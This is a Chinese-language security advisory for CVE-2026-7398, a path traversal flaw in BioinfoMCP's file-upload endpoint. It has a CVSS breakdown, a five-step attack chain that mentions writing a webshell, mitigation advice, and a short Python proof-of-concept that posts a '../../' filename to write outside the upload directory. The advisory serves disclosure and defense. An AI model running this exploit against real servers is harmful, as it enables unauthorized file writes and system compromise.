CVE-2026-7398 BioinfoMCP路径遍历漏洞

漏洞信息

漏洞编号

CVE-2026-7398

漏洞类型

路径遍历

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

florensiawidjaja BioinfoMCP

漏洞概述

BioinfoMCP是一个生物信息学相关平台，在其`bioinfo_mcp_platform/app.py`文件的Upload Endpoint组件中发现了一个安全弱点。该漏洞是由于对上传接口中的“Name”参数缺乏充分的安全验证导致的。攻击者可以通过恶意操纵该参数发起路径遍历攻击。该漏洞无需用户认证即可远程利用，且攻击复杂度较低。由于该产品采用持续交付模式，受影响的版本范围难以精确定义，但截至特定commit（7ada7918...）的版本均受影响。目前该漏洞利用代码已公开，建议相关用户尽快采取措施以防止潜在攻击。

技术细节

该漏洞根植于`bioinfo_mcp_platform/app.py`文件中的文件上传处理逻辑。当服务器处理Upload Endpoint的请求时，会从用户输入中提取`Name`参数，并直接将其用于构建文件系统路径，而未对“../”或绝对路径等特殊字符序列进行清洗或规范化。这种不安全的输入处理方式允许攻击者跳出预定的上传目录。攻击者可以通过构造包含路径遍历序列（如`../../`）的恶意`Name`参数值，将文件写入服务器上的任意位置。考虑到CVSS向量（AV:N/AC:L/PR:N/UI:N/S:U），该漏洞属于高危漏洞。攻击者无需任何权限即可通过网络发起攻击，且不需要用户交互。成功利用此漏洞可能导致敏感信息泄露（C:L）、数据篡改（I:L）甚至服务中断（A:L）。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是易受攻击的BioinfoMCP版本，并定位到文件上传接口。

STEP 2

构造载荷

攻击者构造包含路径遍历字符（如'../../'）的HTTP POST请求，特制'Name'参数以指向系统敏感目录。

STEP 3

发送恶意请求

攻击者向Upload Endpoint发送包含恶意文件名参数的请求，绕过基础目录限制。

STEP 4

写入文件

由于未正确过滤，服务器将上传的文件保存到了攻击者指定的非预期目录。

STEP 5

达成影响

可能导致覆盖系统关键文件、写入Webshell或窃取数据，造成机密性、完整性或可用性损失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_path_traversal(target_url):
    """
    PoC for CVE-2026-7398: Path Traversal in BioinfoMCP Upload Endpoint.
    This script attempts to upload a file to a different directory using the 'Name' parameter.
    """
    upload_endpoint = f"{target_url}/upload"  # Adjust endpoint based on actual route
    
    # The malicious payload uses '../' to traverse directories
    malicious_filename = "../../tmp/poc_exploit.txt"
    
    # Data to be sent, exploiting the 'Name' parameter
    files = {
        'file': ('data.txt', 'This is a proof of concept content.')
    }
    data = {
        'Name': malicious_filename
    }
    
    try:
        response = requests.post(upload_endpoint, files=files, data=data)
        if response.status_code == 200:
            print(f"[+] Request sent successfully. Check if file exists at {malicious_filename}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error during exploitation: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1:8000" # Replace with actual target
    exploit_path_traversal(target)

影响范围

florensiawidjaja BioinfoMCP <= commit 7ada7918b9e515604d3c0ae264d3a9af10bf6e54

防御指南

临时缓解措施

在代码修复前，建议临时禁用文件上传功能或在网络层（如WAF）拦截包含路径遍历字符（如..\、../）的请求。同时，严格限制服务器的文件写入权限，确保Web服务仅对特定的临时上传目录有写权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7398
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7398
3 Details https://www.cvedetails.com/cve/CVE-2026-7398/
4 VulDB https://vuldb.com/cve/CVE-2026-7398
5 Link https://github.com/florensiawidjaja/BioinfoMCP/
6 Link https://github.com/florensiawidjaja/BioinfoMCP/issues/2
7 Link https://vuldb.com/submit/803488
8 Link https://vuldb.com/vuln/360122
9 Link https://vuldb.com/vuln/360122/cti